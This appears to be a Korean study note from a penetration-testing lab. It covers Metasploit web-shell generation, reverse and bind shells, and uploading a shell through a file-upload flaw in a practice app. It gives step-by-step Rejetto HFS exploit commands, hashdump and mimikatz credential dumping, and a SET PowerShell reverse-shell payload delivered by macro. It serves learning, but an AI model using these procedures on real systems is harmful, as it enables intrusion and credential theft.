msfvenom - msfpayload + msfencoder 을 이용하여 웹쉘을 생성한다






웹쉘이 있으면 핸들러가 꼭 필요하다


핸들러 생성을 위해 msfconsole을 사용한다







실행시키고 핸들러를 생성 시켜주면 된다.


공식 개념으로 외워서 사용하면 편하다




바인드<->리버스 개념을 확실히 알고 가야한다 (개념 다시 정리)


바인드:공격자가 대상자에게 직접적인 공격을 가하는거(방화벽에서 차단되기 때문에 잘 사용을 못한다)

리버스:대상자가 공격자에게 직접 붙게하는거



리버스 쉘

리버스 쉘은 공격 대상이 공격자에게 통신하도록 만드는 쉘이다. 공격자는 코드나 커맨드 실행의 성공 후 발생하는 연결을 수신할 리스너 포트를 가져야 한다.



그림 1: 리버스 TCP 쉘


바인드 쉘

바인드 쉘은 공격 대상이 자신의 호스트에 리스너 포트를 열고 들어오는 연결 요청을 대기하게 만드는 쉘이다. 공격자는 공격 대상의 리스닝 포트에 접속하여 추가적인 코드나 커맨드를 실행할 수 있게 된다.



그림 2: 바인드 TCP 쉘


실습을 위해 비박스에 파일업로드 취약점 부분에 생성한 웹쉘을 업로드 한다


웹쉘을 파일을 업로드하면 연결된걸 확인할 수 있다.



윈도우 대상으로 취약점을 조사하기위해서 portfwd를 이용해서 연결시켜준다


meterpreter를 획득하는게 가장 쉽다(포트포워딩)



portfwd add -l 8888 -p 80 -r 192.168.74.133






접속된걸 확인할 수있다.



hfs 서버 취약점 점검 하기

hfs 서버를 왜 이용하는지 이건 뭔지 조사하기 

()




https://www.exploit-db.com/exploits/34668/

exploit-db에 올라온 hfs 취약점을 확인해보면



칼리리눅스에서 윈도우 ip로 접근해 공격 코드를 삽입하게 되면



cmd 창을 켤서 공격이 가능하다





다음은 msf를 이용하여 hfs 취약점으로 공격을 해보면



순서대로  

1.search hfs

2.use exploit/windows/http/rejetto_hfs_exec

3.set RHOST 대상IP

4.set RPORT 80

5.exploit


하면 meterpreter 로 연결된걸 확인할 수 있다.



밑에서 부터는 공격 예시 






screenshot도 가능하고

hashdump 하면 계정 정보도 출력이 가능하다




계정 정보를 hash 값 말고 평문으로 확인하고 싶으면


load mimikatz

load powershell 






이렇게 접속하여 주면 된다




이제 사용자 대상으로 접근해보면

1) cd /usr/share/set


2) ./setoolkit


많은 메뉴의 공격 방법이 있다





1번을 살펴보면 

1누르고 엔터




9번의 파워쉘을 사용하고



1번을 사용하였다

그럼 DNS reverse host 를 입력하라고 나오는데 칼리 리눅스 ip주소를 입력후

그뒤는 기본값을 원하니까 엔터를 입력해준다


listenser를 사용한다고 yes를 눌러준다




그리고 만들어진 파일을 확인해보면 확인을 할 수 있다.



만들어진 파워 쉘을 html 밑에 powershell.txt 로 복사해서 만들어주면 




만들어서 메크로 실행하면 파워쉘이 실행된다 !





+ Recent posts